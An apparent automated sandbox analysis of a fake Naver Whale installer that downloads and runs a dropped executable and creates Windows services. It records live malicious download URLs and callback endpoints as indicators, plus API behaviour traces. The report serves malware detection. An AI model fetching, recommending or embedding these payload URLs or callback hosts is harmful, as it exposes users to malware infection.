Source: https://sgz-1302338321.cos.ap-guangzhou.myqcloud.com/store_app/guardservice.exe |
Avira URL Cloud: Label: malware |
Source: https://sgz-1302338321.cos.ap-guangzhou.myqcloud.com/ |
Avira URL Cloud: Label: malware |
Source: https://sgz-1302338321.cos.ap-guangzhou.myqcloud.com/k |
Avira URL Cloud: Label: malware |
Source: https://sgz-1302338321.cos.ap-guangzhou.myqcloud.com/store_app/guardservice.exe1 |
Avira URL Cloud: Label: malware |
Source: https://sgz-1302338321.cos.ap-guangzhou.myqcloud.com/store_app/guardservice.exe0 |
Avira URL Cloud: Label: malware |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\guardservice[1].exe |
Avira: detection malicious, Label: HEUR/AGEN.1342520 |
Source: C:\Users\user\Desktop\record_hit.exe |
Avira: detection malicious, Label: HEUR/AGEN.1342520 |
Source: www.kenesrakishevinfo.com |
Virustotal: Detection: 11% |
Perma Link |
Source: https://www.kenesrakishevinfo.com |
Virustotal: Detection: 7% |
Perma Link |
Source: https://www.kenesrakishevinfo.com/ |
Virustotal: Detection: 7% |
Perma Link |
Source: https://www.kenesrakishevinfo.com/api/census/RecordHitsuccess://record_hit.exerunas(X |
Virustotal: Detection: 12% |
Perma Link |
Source: https://www.kenesrakishevinfo.com/api/census/RecordHit |
Virustotal: Detection: 13% |
Perma Link |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\guardservice[1].exe |
ReversingLabs: Detection: 58% |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\guardservice[1].exe |
Virustotal: Detection: 63% |
Perma Link |
Source: C:\Users\user\Desktop\record_hit.exe |
ReversingLabs: Detection: 58% |
Source: C:\Users\user\Desktop\record_hit.exe |
Virustotal: Detection: 63% |
Perma Link |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\guardservice[1].exe |
Joe Sandbox ML: detected |
Source: C:\Users\user\Desktop\record_hit.exe |
Joe Sandbox ML: detected |
Source: unknown |
HTTPS traffic detected: 198.185.159.144:443 -> 192.168.2.5:49705 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 159.75.57.69:443 -> 192.168.2.5:49706 version: TLS 1.2 |
Source: WhaleInstall.exe |
Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_00419AF7 lstrcpyA,FindFirstFileA,GetLastError,SetLastError, |
3_2_00419AF7 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_00417689 InternetOpenA,wm_SpaceBin,InternetConnectA,FtpFindFirstFileA,FtpOpenFileA,wm_Open,wm_IsFileExist,wm_Open,wm_Open,wm_SeekToEnd,InternetSetFilePointer,wm_GetTickCount,InternetReadFile,wm_Close,wm_BinLeft,wm_WriteBin,wm_GetTickCount,CallWindowProcA,wm_Close,InternetCloseHandle, |
3_2_00417689 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 4x nop then lea rdx, qword ptr [rbp-31h] |
0_2_00007FF772B2A3D0 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 4x nop then push rbp |
0_2_00007FF772A8B170 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 4x nop then push rbp |
0_2_00007FF772AD87D0 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 4x nop then mov rax, qword ptr [rcx+10h] |
0_2_00007FF772A86519 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 4x nop then push rbp |
0_2_00007FF772A8B630 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 4x nop then sub rsp, 58h |
0_2_00007FF772A6DBB0 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 4x nop then push r15 |
0_2_00007FF772A97B30 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 4x nop then push r15 |
0_2_00007FF772AA8950 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 4x nop then push rbx |
0_2_00007FF772A6DF53 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 4x nop then push rsi |
0_2_00007FF772B27D20 |
Source: Joe Sandbox View |
IP Address: 198.185.159.144 198.185.159.144 |
Source: Joe Sandbox View |
IP Address: 198.185.159.144 198.185.159.144 |
Source: Joe Sandbox View |
IP Address: 159.75.57.69 159.75.57.69 |
Source: Joe Sandbox View |
JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A6216A InternetOpenA,InternetOpenA,InternetCrackUrlA,InternetCloseHandle,InternetConnectA,InternetConnectA,InternetCloseHandle,HttpOpenRequestA,InternetCloseHandle,InternetCloseHandle,strlen,HttpSendRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, |
0_2_00007FF772A6216A |
Source: global traffic |
HTTP traffic detected: GET /store_app/guardservice.exe HTTP/1.1User-Agent: UserAgentHost: sgz-1302338321.cos.ap-guangzhou.myqcloud.comCache-Control: no-cache |
Source: global traffic |
DNS traffic detected: DNS query: www.kenesrakishevinfo.com |
Source: global traffic |
DNS traffic detected: DNS query: sgz-1302338321.cos.ap-guangzhou.myqcloud.com |
Source: unknown |
HTTP traffic detected: POST /api/census/RecordHit HTTP/1.1Content-Type: application/x-www-form-urlencoded; charset=utf-8Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.9Origin: https://www.kenesrakishevinfo.comReferer: https://www.kenesrakishevinfo.com/User-Agent: UserAgentHost: www.kenesrakishevinfo.comContent-Length: 819Cache-Control: no-cache |
Source: record_hit.exe, record_hit.exe, 00000003.00000000.2036936899.000000000042F000.00000008.00000001.01000000.00000006.sdmp, guardservice[1].exe.0.dr, record_hit.exe.0.dr |
String found in binary or memory: http://127.0.0.1:8888/test |
Source: record_hit.exe, 00000003.00000000.2036936899.000000000042F000.00000008.00000001.01000000.00000006.sdmp, guardservice[1].exe.0.dr, record_hit.exe.0.dr |
String found in binary or memory: http://127.0.0.1:8888/testtestMozilla/5.0 |
Source: WhaleInstall.exe |
String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E |
Source: WhaleInstall.exe |
String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0 |
Source: WhaleInstall.exe |
String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0 |
Source: WhaleInstall.exe |
String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C |
Source: WhaleInstall.exe |
String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0 |
Source: WhaleInstall.exe |
String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S |
Source: WhaleInstall.exe |
String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0 |
Source: WhaleInstall.exe |
String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0 |
Source: WhaleInstall.exe |
String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0= |
Source: WhaleInstall.exe |
String found in binary or memory: http://ocsp.digicert.com0 |
Source: WhaleInstall.exe |
String found in binary or memory: http://ocsp.digicert.com0A |
Source: WhaleInstall.exe |
String found in binary or memory: http://ocsp.digicert.com0C |
Source: WhaleInstall.exe |
String found in binary or memory: http://ocsp.digicert.com0X |
Source: WhaleInstall.exe |
String found in binary or memory: http://whale.naver.com0 |
Source: WhaleInstall.exe |
String found in binary or memory: http://www.digicert.com/CPS0 |
Source: record_hit.exe, 00000003.00000002.3249816865.0000000000444000.00000002.00000001.01000000.00000006.sdmp, guardservice[1].exe.0.dr, record_hit.exe.0.dr |
String found in binary or memory: http://www.eyuyan.com)DVarFileInfo$ |
Source: record_hit.exe, record_hit.exe, 00000003.00000000.2036936899.000000000042F000.00000008.00000001.01000000.00000006.sdmp, guardservice[1].exe.0.dr, record_hit.exe.0.dr |
String found in binary or memory: https://file.znhds.com.cn/pd/update/Update.exe |
Source: record_hit.exe, 00000003.00000000.2036936899.000000000042F000.00000008.00000001.01000000.00000006.sdmp, guardservice[1].exe.0.dr, record_hit.exe.0.dr |
String found in binary or memory: https://file.znhds.com.cn/pd/update/Update.exeD: |
Source: WhaleInstall.exe, 00000000.00000003.2035855940.000002AA26CCD000.00000004.00000020.00020000.00000000.sdmp, WhaleInstall.exe, 00000000.00000002.3249830273.000002AA26CCD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://sgz-1302338321.cos.ap-guangzhou.myqcloud.com/ |
Source: WhaleInstall.exe, 00000000.00000003.2035855940.000002AA26CCD000.00000004.00000020.00020000.00000000.sdmp, WhaleInstall.exe, 00000000.00000002.3249830273.000002AA26CCD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://sgz-1302338321.cos.ap-guangzhou.myqcloud.com/k |
Source: WhaleInstall.exe, 00000000.00000002.3249989939.000002AA26D16000.00000004.00000020.00020000.00000000.sdmp, WhaleInstall.exe, 00000000.00000003.2035855940.000002AA26C9B000.00000004.00000020.00020000.00000000.sdmp, WhaleInstall.exe, 00000000.00000002.3249830273.000002AA26C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://sgz-1302338321.cos.ap-guangzhou.myqcloud.com/store_app/guardservice.exe |
Source: WhaleInstall.exe, 00000000.00000002.3249830273.000002AA26C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://sgz-1302338321.cos.ap-guangzhou.myqcloud.com/store_app/guardservice.exe0 |
Source: WhaleInstall.exe, 00000000.00000003.2035855940.000002AA26C9B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://sgz-1302338321.cos.ap-guangzhou.myqcloud.com/store_app/guardservice.exe1 |
Source: WhaleInstall.exe |
String found in binary or memory: https://www.kenesrakishevinfo.com |
Source: WhaleInstall.exe |
String found in binary or memory: https://www.kenesrakishevinfo.com/ |
Source: WhaleInstall.exe |
String found in binary or memory: https://www.kenesrakishevinfo.com/api/census/RecordHit |
Source: WhaleInstall.exe |
String found in binary or memory: https://www.kenesrakishevinfo.com/api/census/RecordHitsuccess://record_hit.exerunas(X |
Source: WhaleInstall.exe, 00000000.00000002.3249830273.000002AA26C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.kenesrakishevinfo.com/f |
Source: WhaleInstall.exe, 00000000.00000002.3249830273.000002AA26C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.kenesrakishevinfo.com/l |
Source: WhaleInstall.exe |
String found in binary or memory: https://www.kenesrakishevinfo.comReferer: |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown |
HTTPS traffic detected: 198.185.159.144:443 -> 192.168.2.5:49705 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 159.75.57.69:443 -> 192.168.2.5:49706 version: TLS 1.2 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_00426A84 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, |
3_2_00426A84 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_00409F47 GetCurrentProcess,OpenProcess,LocalAlloc,NtQueryInformationProcess,LocalFree,CloseHandle, |
3_2_00409F47 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_0040AFF1 OpenSCManagerA,wm_BOr,OpenServiceA,DeleteService,CloseServiceHandle,CloseServiceHandle, |
3_2_0040AFF1 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772AAC340 |
0_2_00007FF772AAC340 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A65370 |
0_2_00007FF772A65370 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772AAB430 |
0_2_00007FF772AAB430 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772AE9490 |
0_2_00007FF772AE9490 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772AAE210 |
0_2_00007FF772AAE210 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A932A0 |
0_2_00007FF772A932A0 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772AAD270 |
0_2_00007FF772AAD270 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A6C750 |
0_2_00007FF772A6C750 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A74770 |
0_2_00007FF772A74770 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A9F8F8 |
0_2_00007FF772A9F8F8 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A81900 |
0_2_00007FF772A81900 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A878E0 |
0_2_00007FF772A878E0 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772AA95D0 |
0_2_00007FF772AA95D0 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772B0B5C0 |
0_2_00007FF772B0B5C0 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772AAA520 |
0_2_00007FF772AAA520 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A73570 |
0_2_00007FF772A73570 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A946A0 |
0_2_00007FF772A946A0 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A996E0 |
0_2_00007FF772A996E0 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A956E0 |
0_2_00007FF772A956E0 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A6FBD0 |
0_2_00007FF772A6FBD0 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A97B30 |
0_2_00007FF772A97B30 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A9DCB0 |
0_2_00007FF772A9DCB0 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772AA0C38 |
0_2_00007FF772AA0C38 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A8D9D0 |
0_2_00007FF772A8D9D0 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A9A960 |
0_2_00007FF772A9A960 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A9FAC0 |
0_2_00007FF772A9FAC0 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A8CAB0 |
0_2_00007FF772A8CAB0 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A9BAA0 |
0_2_00007FF772A9BAA0 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A78B00 |
0_2_00007FF772A78B00 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A700C0 |
0_2_00007FF772A700C0 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A8D080 |
0_2_00007FF772A8D080 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772AA0E00 |
0_2_00007FF772AA0E00 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A75F00 |
0_2_00007FF772A75F00 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A65E50 |
0_2_00007FF772A65E50 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A7EE60 |
0_2_00007FF772A7EE60 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_0042229B |
3_2_0042229B |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_0041ED64 |
3_2_0041ED64 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_00425ECE |
3_2_00425ECE |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_0041B770 |
3_2_0041B770 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: String function: 00007FF772A6EB80 appears 33 times |
|
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: String function: 00007FF772B2CDD0 appears 50 times |
|
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: String function: 00007FF772B336D0 appears 86 times |
|
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: String function: 00007FF772B335E0 appears 78 times |
|
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: String function: 0041BC40 appears 43 times |
|
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: String function: 0041A652 appears 34 times |
|
Source: WhaleInstall.exe |
Static PE information: invalid certificate |
Source: WhaleInstall.exe |
Static PE information: Number of sections : 20 > 10 |
Source: WhaleInstall.exe |
Binary or memory string: OriginalFilename vs WhaleInstall.exe |
Source: WhaleInstall.exe, 00000000.00000000.1999421791.00007FF772B72000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenameWhaleSetup.exeL vs WhaleInstall.exe |
Source: WhaleInstall.exe |
Binary or memory string: OriginalFilenameWhaleSetup.exeL vs WhaleInstall.exe |
Source: classification engine |
Classification label: mal76.winEXE@4/3@2/2 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: OpenSCManagerA,wm_BOr,wm_Chr,CreateServiceA,CloseServiceHandle,CloseServiceHandle, |
3_2_0040ADF0 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_0040997E CreateToolhelp32Snapshot,Process32First,wm_Str,wm_StrComp,CloseHandle,Process32Next,CloseHandle, |
3_2_0040997E |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_004193E0 CoCreateInstance,MultiByteToWideChar, |
3_2_004193E0 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_0040C0A9 OpenSCManagerA,OpenServiceA,wm_Chr,wm_Chr,wm_Chr,wm_Chr,wm_Chr,ChangeServiceConfigA,CloseServiceHandle,CloseServiceHandle, |
3_2_0040C0A9 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\guardservice[1].exe |
Jump to behavior |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4788:120:WilError_03 |
Source: WhaleInstall.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: unknown |
Process created: C:\Users\user\Desktop\WhaleInstall.exe "C:\Users\user\Desktop\WhaleInstall.exe" |
|
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Process created: C:\Users\user\Desktop\record_hit.exe "C:\Users\user\Desktop\record_hit.exe" |
|
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Process created: C:\Users\user\Desktop\record_hit.exe "C:\Users\user\Desktop\record_hit.exe" |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: schannel.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: mskeyprotect.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: ncryptsslp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: pcacli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Section loaded: sfc_os.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\record_hit.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\record_hit.exe |
Section loaded: odbc32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\record_hit.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\record_hit.exe |
Section loaded: wmvert.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\record_hit.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 |
Jump to behavior |
Source: WhaleInstall.exe |
Static PE information: Image base 0x140000000 > 0x60000000 |
Source: WhaleInstall.exe |
Static file information: File size 3441498 > 1048576 |
Source: WhaleInstall.exe |
Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Code function: 0_2_00007FF772A77DE0 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress, |
0_2_00007FF772A77DE0 |
Source: WhaleInstall.exe |
Static PE information: real checksum: 0x34d876 should be: 0x34a518 |
Source: guardservice[1].exe.0.dr |
Static PE information: real checksum: 0x0 should be: 0x58c53 |
Source: record_hit.exe.0.dr |
Static PE information: real checksum: 0x0 should be: 0x58c53 |
Source: WhaleInstall.exe |
Static PE information: section name: .xdata |
Source: WhaleInstall.exe |
Static PE information: section name: /4 |
Source: WhaleInstall.exe |
Static PE information: section name: /19 |
Source: WhaleInstall.exe |
Static PE information: section name: /31 |
Source: WhaleInstall.exe |
Static PE information: section name: /45 |
Source: WhaleInstall.exe |
Static PE information: section name: /57 |
Source: WhaleInstall.exe |
Static PE information: section name: /70 |
Source: WhaleInstall.exe |
Static PE information: section name: /81 |
Source: WhaleInstall.exe |
Static PE information: section name: /97 |
Source: WhaleInstall.exe |
Static PE information: section name: /113 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_0041BC40 push eax; ret |
3_2_0041BC5E |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_0041AC90 push eax; ret |
3_2_0041ACBE |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\guardservice[1].exe |
Jump to dropped file |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
File created: C:\Users\user\Desktop\record_hit.exe |
Jump to dropped file |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_0040B163 OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle, |
3_2_0040B163 |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: 3_2_0041A199 IsIconic,GetWindowPlacement,GetWindowRect, |
3_2_0041A199 |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot |
Jump to behavior |
Source: C:\Users\user\Desktop\WhaleInstall.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\record_hit.exe |
Code function: wm_ZeroAry,OpenSCManagerA,EnumServicesStatusA,GetProcessHeap,HeapAlloc,EnumServicesStatusA,wm_pbin,RtlMoveMemory,wm_pstr,wm_pstr,OpenServiceA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,RtlMoveMemory,wm_UCase,wm_UCase,wm_InStr,wm_UCase,wm_InStr,wm_UCase,wm_InStr,GetProcessHeap,HeapFree,CloseServiceHandle,wm_DoEvents,GetProcessHeap,HeapFree,CloseServiceHandle, |
3_2_0040C827 |
Source: C:\Users\user\Desktop\record_hit.exe |
